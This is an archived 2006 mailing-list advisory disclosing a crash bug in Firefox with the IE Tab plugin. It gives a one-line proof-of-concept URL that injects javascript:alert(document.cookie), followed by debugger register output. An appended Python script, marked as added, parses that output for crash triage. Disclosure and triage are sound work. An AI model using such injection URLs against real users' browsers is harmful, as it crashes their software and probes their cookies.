Message-ID: <446b702e.4d846024.4993.221a@mx.gmail.com>
Date: Wed May 17 19:49:28 2006
From: debasis.mohanty.listmails at gmail.com (Debasis Mohanty)
Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug

Firefox (with IETab Plugin) Null Pointer Dereferences Bug 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab 

Tested On: 
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction: 
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
(April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
;-)

Bug Details: 	
Firefox with IETab installed crashes when the IETab plugin is unable to
handle specific JavaScript. It seems to be a null pointer dereference bug.
For more details, refer to the PoC section.

Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter - 

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

Register details after the crash:

(1e4.3e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]                ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]                ds:0023:00000000=????



For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com
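
A triage sketch for the debugger output above, added here as an example and not part of the original post: it parses the WinDbg text and checks whether the dump supports the null-pointer-dereference reading (read or write access, zero base register, unmapped target in the first 64 KiB). The `triage` function, its field names and the `NEAR_SYMBOL` threshold are assumptions of this example.

```python
import re

# Debugger excerpt from the report above, with wrapped lines rejoined.
CRASH_LOG = """\
(1e4.3e0): Access violation - code c0000005 (first chance)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po nc
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]                ds:0023:00000000=????
"""

NULL_PARTITION = 0x10000  # Windows keeps the first 64 KiB of user space unmapped
NEAR_SYMBOL = 0x1000      # assumed heuristic: a larger offset suggests export-only symbols

REG = re.compile(r"\b(e(?:ax|bx|cx|dx|si|di|ip|sp|bp))=([0-9a-f]{8})")
SYM = re.compile(r"^(\w+)!(\w+)\+0x([0-9a-f]+):", re.M)
INSN = re.compile(
    r"^([0-9a-f]{8}) [0-9a-f]+\s+(\w+)\s+(\S+)\s+\w\w:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)",
    re.M,
)

def triage(log):
    """Summarise one WinDbg access-violation dump for crash triage."""
    regs = {name: int(val, 16) for name, val in REG.findall(log)}
    module, symbol, offset = SYM.search(log).groups()
    addr, mnemonic, operands, target, value = INSN.search(log).groups()
    dst, _, _src = operands.partition(",")
    base = re.search(r"\[(e\w\w)", operands)      # register used as the pointer
    unmapped = set(value) == {"?"}                # debugger could not read the target
    return {
        "module": module,
        "instruction": f"{mnemonic} {operands}",
        # A memory operand in the destination is a write; otherwise it is a read.
        "access": "write" if "[" in dst else "read",
        "fault_at_eip": int(addr, 16) == regs["eip"],
        "base_register": base.group(1) if base else None,
        "base_is_zero": bool(base) and regs[base.group(1)] == 0,
        "null_deref": unmapped and int(target, 16) < NULL_PARTITION,
        # Far from the named export: the name is only the nearest export, not the real function.
        "symbol_trustworthy": int(offset, 16) < NEAR_SYMBOL,
    }

if __name__ == "__main__":
    for key, val in triage(CRASH_LOG).items():
        print(f"{key}: {val}")
```

For this dump the result is a read through a zero `eax` at address 0, and the `+0xb8ac` offset shows that `NP_GetEntryPoints` is only the nearest exported name, so the faulting function itself is not identified without symbols for `npietab`.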
